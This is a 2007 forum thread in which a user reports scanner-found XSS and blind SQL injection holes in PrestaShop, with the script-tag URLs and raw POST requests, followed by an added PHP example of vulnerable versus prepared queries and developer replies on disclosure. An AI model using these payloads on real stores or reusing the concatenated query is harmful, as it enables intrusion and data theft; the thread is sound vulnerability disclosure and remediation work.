tijuan Posted November 27, 2007
Found this application nice for my needs but after a scan on the frontend, I discovered 9 security holes
---------------------------------------------------
3 XSS
- /prestashop/search.php/>"><ScRiPt>alert(1284656107)</ScRiPt>
- /prestashop/order.php/>"><ScRiPt>alert(1847082919)</ScRiPt>
- /prestashop/index.php/>"><ScRiPt>alert(1868783360)</ScRiPt>
---------------------------------------------------
6 Blind SQL/XPATH injection (string inputs and numeric inputs)
- /prestashop/delivery.php
POST /TESTS/prestashop/prestashop/delivery.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 27
Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly
Connection: Close
Pragma: no-cache

id_currency=1'+and+'1'%3D'0
---------------------------------------------------
- /prestashop/modules/cheque/payment.php (same header)
---------------------------------------------------
- /prestashop/history.php
POST /TESTS/prestashop/prestashop/history.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 23
Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly
Connection: Close
Pragma: no-cache

id_currency=1+and+1%3D0
---------------------------------------------------
- /prestashop/modules/cheque/payment.php (same header)
---------------------------------------------------
- /prestashop/contact-form.php
POST /TESTS/prestashop/prestashop/contact-form.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 132
Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly
Connection: Close
Pragma: no-cache

id_contact=0&[email protected]"+and+"1"%3D"0&[email protected]&submitMessage=%E5%8F%91%E9%80%81
---------------------------------------------------
- /prestashop/history.php
POST /TESTS/prestashop/prestashop/history.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 27
Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly
Connection: Close
Pragma: no-cache

id_currency=1"+and+"1"%3D"0
---------------------------------------------------
All these security issues come from bad input filtering of course. Good Luck.
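An added example, not from this thread or from PrestaShop's code, showing the query shape that the id_currency payloads above depend on beside a validated, prepared form, plus attribute escaping for the request path reflected in the XSS findings. The ps_currency table name, the SQLite in-memory store used for the demo, and the assumption that the XSS comes from a template echoing the request URI unescaped are all mine.

```php
<?php
// Added example (not PrestaShop code). ps_currency, the SQLite demo store and
// the "echoed request URI" explanation of the XSS are assumptions.
declare(strict_types=1);

function check(bool $ok, string $what): void
{
    if (!$ok) { throw new RuntimeException("check failed: $what"); }
}

// Blind SQL injection: the payloads 1' and '1'='0 / 1 and 1=0 only change the
// result when the raw POST value is spliced into the query text like this.
function vulnerableCurrencyQuery(string $idCurrency): string
{
    // 'before' form: a quoted payload closes the literal and appends a condition.
    return "SELECT * FROM ps_currency WHERE id_currency = '" . $idCurrency . "'";
}

function currencyById(PDO $db, string $rawId): ?array
{
    // Accept only a non-empty run of digits; both the string and the numeric
    // variants of the payload are rejected before any SQL is built.
    if (!ctype_digit($rawId)) {
        return null;
    }
    // Bind the value instead of concatenating it into the statement.
    $stmt = $db->prepare('SELECT id_currency, name FROM ps_currency WHERE id_currency = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Reflected XSS: a payload appended to the path (search.php/>"><ScRiPt>...)
// lands in the page when a template echoes the request URI into an attribute
// unescaped. Escaping quotes and angle brackets keeps it inside the attribute.
function safeFormAction(string $requestUri): string
{
    return htmlspecialchars($requestUri, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Self-check on constructed inputs taken from the report above.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE ps_currency (id_currency INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO ps_currency VALUES (1, 'EUR')");

check(currencyById($db, "1' and '1'='0") === null, 'string payload rejected');
check(currencyById($db, '1 and 1=0') === null, 'numeric payload rejected');
check(currencyById($db, '1')['name'] === 'EUR', 'valid id still resolves');
$escaped = safeFormAction('/prestashop/search.php/>"><ScRiPt>alert(1)</ScRiPt>');
check(strpos($escaped, '<') === false && strpos($escaped, '"') === false, 'path escaped');
echo "checks passed\n";
```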
Bruno Leveque Posted November 28, 2007
Hi tijuan! Thanks for your work! These security holes will be fixed before the 0.8.9 release, of course. We are searching for people like you, do not hesitate to contact us directly for testing purposes. Best regards, Bruno Lévêque
Peter Wilson Posted November 28, 2007
Excellent job, tijuan. You have done us and all PrestaShop users a huge favor by reporting these issues. PrestaShop makes security a top priority. To all of our users, we ask that you please report any and all security issues as soon as they are discovered, either by posting in this forum or by e-mailing us at [email protected].
James Posted November 28, 2007
When version one is released, I don't think reporting security holes on a public forum will be a good idea. Granted they need reporting, but maybe in a discreet manner.
Peter Wilson Posted November 28, 2007
Good point, James. While we don't want to shut off any method of communication entirely, after v1.0 we should probably emphasize the use of the [email protected] e-mail address while placing revealing forum posts in quarantine until we release a fixed update of the software. Just FYI, fixing these security holes has delayed the release of v0.8.9 by a few hours. Thank you for your patience.
tijuan Posted November 28, 2007
Actually, I did not see this email address, and as I said to Bruno on the phone today, I saw this forum category and thought that was the right place for this alert. But I'll sure use the email next time, if there should be a next time. I'm glad I could help.
Peter Wilson Posted November 28, 2007
Hi tijuan, The reason you didn't see that e-mail address ([email protected]) is simple: We hadn't published it anywhere yet. In fact, we created it after your post. So you did the right thing by posting your security issues here. ;D Pointing out flaws in our security, delaying our next release, making us create new e-mail addresses ... who invited you here, anyway? But seriously, please feel free to contribute again.
tijuan Posted November 28, 2007
My bad. Of course I'll help if I see something else.